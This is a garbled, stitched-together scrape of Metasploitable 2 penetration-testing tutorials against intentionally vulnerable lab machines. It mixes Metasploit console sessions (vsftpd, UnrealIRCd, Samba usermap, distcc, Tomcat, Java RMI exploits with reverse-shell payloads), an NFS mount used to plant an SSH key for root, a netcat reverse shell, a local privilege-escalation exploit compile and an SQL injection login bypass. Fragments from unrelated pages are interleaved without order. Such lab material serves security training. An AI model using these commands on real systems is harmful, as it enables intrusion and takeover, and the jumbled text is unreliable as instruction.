Mutillidae has numerous different types of web application vulnerabilities to discover and with varying levels of difficulty to learn from and challenge budding Pentesters. I am new to penetration testing . msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp Andrea Fortuna. Return to the VirtualBox Wizard now. -- ---- DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2021-02-06 17:31:48 +0300 In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. Below is a list of the tools and services that this course will teach you how to use. Cross site scripting on the host/ip fieldO/S Command injection on the host/ip fieldThis page writes to the log. Exploit target: Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address, https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. In this article we continue to demonstrate discovering & exploiting some of the intentional vulnerabilities within a Metasploitable penetration testing target. To access official Ubuntu documentation, please visit: Lets proceed with our exploitation. XSS via any of the displayed fields. Module options (auxiliary/scanner/smb/smb_version): Long list the files with attributes in the local folder. Step 8: Display all the user tables in information_schema. Exploit target: msf exploit(vsftpd_234_backdoor) > show options This set of articles discusses the RED TEAM's tools and routes of attack. msf auxiliary(telnet_version) > show options Exploits include buffer overflow, code injection, and web application exploits. RHOST => 192.168.127.154 Compatible Payloads 0 Linux x86 ================ [+] Backdoor service has been spawned, handling SMBUser no The username to authenticate as [*] Writing to socket A This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. A test environment provides a secure place to perform penetration testing and security research. Ultimately they all fall flat in certain areas. Essentially thistests whether the root account has a weak SSH key, checking each key in the directory where you have stored the keys. [*] Writing to socket A To proceed, click the Next button. root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor -- ---- RHOST => 192.168.127.154 This must be an address on the local machine or 0.0.0.0 Time for some escalation of local privilege. [*] Successfully sent exploit request The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. Module options (exploit/multi/misc/java_rmi_server): ---- --------------- -------- ----------- 0 Automatic Target The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities. [*] 192.168.127.154:5432 Postgres - Disconnected This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. Id Name This is about as easy as it gets. In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. TOMCAT_USER no The username to authenticate as Oracle is a registered trademark of Oracle Corporation and/or its, affiliates. payload => cmd/unix/reverse root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. PASSWORD => tomcat The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution. Commands end with ; or \g. Exploit target: On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. Both operating systems will be running as VMs within VirtualBox. Yet weve got the basics covered. In this example, the URL would be http://192.168.56.101/phpinfo.php. An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system. You can connect to a remote MySQL database server using an account that is not password-protected. In Cisco Prime LAN Management Solution, this vulnerability is reported to exist but may be present on any host that is not configured appropriately. SESSION yes The session to run this module on. LPORT 4444 yes The listen port The same exploit that we used manually before was very simple and quick in Metasploit. Metasploitable 2 is a deliberately vulnerable Linux installation. msf exploit(unreal_ircd_3281_backdoor) > show options payload => java/meterpreter/reverse_tcp [-] Exploit failed: Errno::EINVAL Invalid argument For network clients, it acknowledges and runs compilation tasks. STOP_ON_SUCCESS => true [*] Accepted the second client connection List of known vulnerabilities and exploits . Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! msf exploit(java_rmi_server) > show options The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system. The ++ signifies that all computers should be treated as friendlies and be allowed to . To download Metasploitable 2, visitthe following link. However this host has old versions of services, weak passwords and encryptions. High-end tools like Metasploit and Nmap can be used to test this application by security enthusiasts. First, whats Metasploit? PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line TOMCAT_PASS no The Password for the specified username Step 1: Setup DVWA for SQL Injection. msf exploit(postgres_payload) > set LHOST 192.168.127.159 msf exploit(distcc_exec) > set LHOST 192.168.127.159 Module options (exploit/linux/local/udev_netlink): For this, Metasploit has an exploit available: A documented security flaw is used by this module to implement arbitrary commands on any system operating distccd. Every CVE Record added to the list is assigned and published by a CNA. PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) msf auxiliary(tomcat_administration) > show options The interface looks like a Linux command-line shell. msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 Id Name RPORT 23 yes The target port LHOST yes The listen address Id Name -- ---- Here's what's going on with this vulnerability. now you can do some post exploitation. A Computer Science portal for geeks. whoami Here is the list of remote server databases: information_schema dvwa metasploit mysql owasp10 tikiwiki tikiwiki195. BLANK_PASSWORDS false no Try blank passwords for all users It could be used against both rmiregistry and rmid and many other (custom) RMI endpoints as it brings up a method in the RMI Distributed Garbage Collector that is available through any RMI endpoint. To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. Cross site scripting via the HTTP_USER_AGENT HTTP header. A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. RHOST yes The target address From the shell, run the ifconfig command to identify the IP address. I employ the following penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and exploitation. The-e flag is intended to indicate exports: Oh, how sweet! Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. [*] Connected to 192.168.127.154:6667 [*] Matching Lets see if we can really connect without a password to the database as root. Set-up This . The Metasploit Framework is the most commonly-used framework for hackers worldwide. msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. The applications are installed in Metasploitable 2 in the /var/www directory. It is intended to be used as a target for testing exploits with metasploit. 5.port 1524 (Ingres database backdoor ) In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp RPORT 139 yes The target port whoami VHOST no HTTP server virtual host Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. The VNC service provides remote desktop access using the password password. msf exploit(drb_remote_codeexec) > show options Module options (exploit/multi/samba/usermap_script): whoami From the results, we can see the open ports 139 and 445. Step 3: Set the memory size to 512 MB, which is adequate for Metasploitable2. Step 1: Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. Metasploitable 2 is a straight-up download. What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. payload => cmd/unix/reverse :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Writing to socket B [*] A is input whoami So weregoing to connect to it using vncviewer: Connected to RFB server, using protocol version 3.3, Desktop name roots X desktop (metasploitable:0). The account root doesnt have a password. msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159 Back on the Login page try entering the following SQL Injection code with a trailing space into the Name field: The Login should now work successfully without having to input a password! msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat payload => linux/x86/meterpreter/reverse_tcp Restart the web server via the following command. There was however an error generated though this did not stop the ability to run commands on the server including ls -la above and more: Whilst we can consider this a success, repeating the exploit a few times resulted in the original error returned. IP address are assigned starting from "101". Id Name [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2021-02-06 21:34:46 +0300 The following sections describe the requirements and instructions for setting up a vulnerable target. All right, there are a lot of services just awaitingour consideration. To access the web applications, open a web browser and enter the URL http:// where is the IP address of Metasploitable 2. [*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2021-02-06 23:31:44 +0300 After the virtual machine boots, login to console with username msfadmin and password msfadmin. msf exploit(usermap_script) > set LHOST 192.168.127.159 msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp [+] Found netlink pid: 2769 payload => cmd/unix/reverse Exploit target: msf exploit(java_rmi_server) > set RHOST 192.168.127.154 Name Current Setting Required Description [*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Attackers can implement arbitrary commands by defining a username that includes shell metacharacters. Metasploitable 2 has deliberately vulnerable web applications pre-installed. -- ---- Module options (exploit/unix/ftp/vsftpd_234_backdoor): ---- --------------- -------- ----------- PASSWORD => tomcat 0 Automatic msf exploit(twiki_history) > exploit The web server starts automatically when Metasploitable 2 is booted. By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. [*] Reading from sockets msf exploit(postgres_payload) > exploit [*] Banner: 220 (vsFTPd 2.3.4) For your test environment, you need a Metasploit instance that can access a vulnerable target. [*] Backgrounding session 1 [*] Matching Exploit target: ---- --------------- -------- ----------- Payload options (cmd/unix/interact): SSLCert no Path to a custom SSL certificate (default is randomly generated) [*] Accepted the first client connection When we performed a scan with Nmap during scanning and enumeration stage, we have seen that ports 21,22,23 are open and running FTP, Telnet and SSH . Lets begin by pulling up the Mutillidae homepage: Notice that the Security Level is set to 0, Hints is also set to 0, and that the user is not Logged In. [*] B: "D0Yvs2n6TnTUDmPF\r\n" [*] Attempting to autodetect netlink pid LHOST => 192.168.127.159 0 Automatic Next, you will get to see the following screen. [*] Started reverse double handler The payload is uploaded using a PUT request as a WAR archive comprising a jsp application. [*] Reading from socket B The main purpose of this vulnerable application is network testing. [*] Scanned 1 of 1 hosts (100% complete) It comes with a large database of exploits for a variety of platforms and can be used to test the security of systems and look for vulnerabilities. 15. After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. Do you have any feedback on the above examples or a resolution to our TWiki History problem? This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability. -- ---- msf exploit(distcc_exec) > show options The Rapid7 Metasploit community has developed a machine with a range of vulnerabilities. [*] Matching PASSWORD no The Password for the specified username ---- --------------- -------- ----------- To begin, Nessus wants us to input a range of IP addresses so that we can discover some targets to scan. [*] Matching [*] Reading from socket B [*] Command: echo f8rjvIDZRdKBtu0F; 0 Automatic SESSION => 1 root 2768 0.0 0.1 2092 620 ? msf exploit(distcc_exec) > exploit Were not going to go into the web applications here because, in this article, were focused on host-based exploitation. Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. From a security perspective, anything labeled Java is expected to be interesting. Sources referenced include OWASP (Open Web Application Security Project) amongst others. You can edit any TWiki page. So I'm going to exploit 7 different remote vulnerabilities , here are the list of vulnerabilities. Getting started root, msf > use auxiliary/scanner/postgres/postgres_login A command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 is exploited by this module while using the non-default Username Map Script configuration option. It is a pre-built virtual machine, and therefore it is simple to install. First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search